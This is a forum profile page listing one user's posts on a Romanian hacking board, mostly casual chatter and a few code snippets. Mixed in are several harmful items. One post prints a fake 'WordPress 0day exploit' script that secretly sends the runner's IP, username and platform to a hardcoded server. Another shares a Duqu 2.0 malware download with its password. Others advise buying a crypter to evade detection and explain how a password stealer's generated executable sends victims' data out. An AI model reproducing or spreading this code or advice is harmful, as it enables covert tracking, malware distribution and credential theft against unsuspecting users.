Jump to content

Byte-ul

Active Members
  • Posts

    2175
  • Joined

  • Last visited

  • Days Won

    30

Everything posted by Byte-ul

  1. Am decis sa-l uploadez pe Pufi, botul facut pentru chat ( banat de Gecko ), pe github. https://github.com/Caydenz/Pufi---Ajax-Chat-Bot Oricine poate sa contribuie la el Unele chestii sunt scrise foarte aiurea, o sa le fixez in timp.
  2. Am crezut initial ca e un copy-paste marca Aerosol. I was so wrong. Bravo! ("Payload Sent" )
  3. Deci Rickets chiar vrea sa invete ceva spre deosebire de Aerosol. Altceva nu am de zis.
  4. Niciunul nu are rost sa ramana atat timp cat nu se pot face si altele.
  5. Citeste primul post. Scrie tot acolo.
  6. Va costa 5 BTC. PM daca sunteti interesati.
  7. Sunt ceva posturi la care inca este nevoie sa dai like pentru a le vedea. Se poate scoate? https://rstforums.com/forum/94546-rst-cycler-bot.rst https://rstforums.com/forum/96128-rst-instagram-scrapper.rst https://rstforums.com/forum/86635-chill-tv-org-tv-online.rst https://rstforums.com/forum/97187-tocmai-ro-scraper-numar-telefon-localitate-nume.rst (probabil mai sunt, pe astea le-am gasit rapid)
  8. Public Class Form1 Private ReadOnly _ _performanceCounter As _ New PerformanceCounter("Process", "% Processor Time", GetProcessInstanceName(Process.GetCurrentProcess.Id)) Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click Timer1.Start() End Sub Private Sub Timer1_Tick(sender As Object, e As EventArgs) Handles Timer1.Tick Dim asd = CInt(_performanceCounter.NextValue() / Environment.ProcessorCount).ToString & "%" Label1.Text = asd End Sub Private Shared Function GetProcessInstanceName(pid As Integer) As String Dim cat As New PerformanceCounterCategory("Process") Dim instances As String() = cat.GetInstanceNames() For Each instance As String In instances Using cnt As New PerformanceCounter("Process", "ID Process", instance, True) Dim val = CInt(cnt.RawValue) If val = pid Then Return instance End If End Using Next Throw _ New Exception( "Could not find performance counter " + "instance name for current process. This is truly strange ...") End Function End Class asta merge.
  9. Incearca sa nu rulezi din debugger. Poate afecteaza.
  10. Download: duqu 2.0.rar pass: virus
  11. E acelasi caracter de un milion de ori. Ar fi trebuit sa fie mult mai mic daca se utiliza o compresie potrivita.
  12. Byte-ul

    Ajutor

    Tocmai te-ai descris pe tine... trist.
  13. Byte-ul

    Ajutor

    Esti atat de prost incat crezi ca te injura. Mda, se vede ca au luat copiii vacanta.
  14. Nu se da
  15. Sau poti folosi Steam Achievment Manager pentru a face idle la toate jocurile in acelasi timp @Goke poti pune scriptul pe un VPS.
  16. Pai o am instalata pe laptop, deci probabil nu
  17. ICANN proposes websites associated to "commercial activity" will no longer be able to use WHOIS protection services. Under new guidelines proposed by MarkMonitor and others who represent the same industries that backed SOPA, domain holders with sites associated to "commercial activity" will no longer be able to protect their private information with WHOIS protection services. "Commercial activity" casts a wide net, which means that a vast number of domain holders will be affected. Your privacy provider could be forced to publish your contact data in WHOIS or even give it out to anyone who complains about your website, without due process. Why should a small business owner have to publicize her home address just to have a website? We think your privacy should be protected, regardless of whether your website is personal or commercial, and your confidential info should not be revealed without due process. If you agree, it’s time to tell ICANN. To view the new proposed rules, visit: Privacy & Proxy Services Accreditation Issues Policy. Source: https://www.respectourprivacy.com/
  18. # Embedded file name: test.py import sys import uuid from md5 import md5 from urllib2 import urlopen import platform import os import time x = '[+] password: ' + md5(str(uuid.uuid4())).hexdigest() x1 = 'http://46.101.188.181/a.php?t=' + urlopen('http://ip.42.pl/raw').read() + '_' + os.getenv('USERNAME') + '_' + platform.platform() x2 = urlopen(x1).read() if len(sys.argv) == 1: sys.exit('No argument specified') print 'Wordpress 4.2.2 0day exploit' time.sleep(2) print '[+] Trying: %s' % str(sys.argv[1]) time.sleep(5) print '[+] user: admin' time.sleep(3) print x
  19. Folosesti un crypter. Poti cumpara de aici: Hack Forums - Site Challenge
  20. Pentru ca executabilul pe care il generezi cu "Coailii Password Recovery.exe" o sa trimita informatiile acolo.
  21. Nimic. Tu le dai .exe-ul generat de program si ei trebuie sa-l ruleze.
  22. Da
  23. <nu mai functioneaza>
×
×
  • Create New...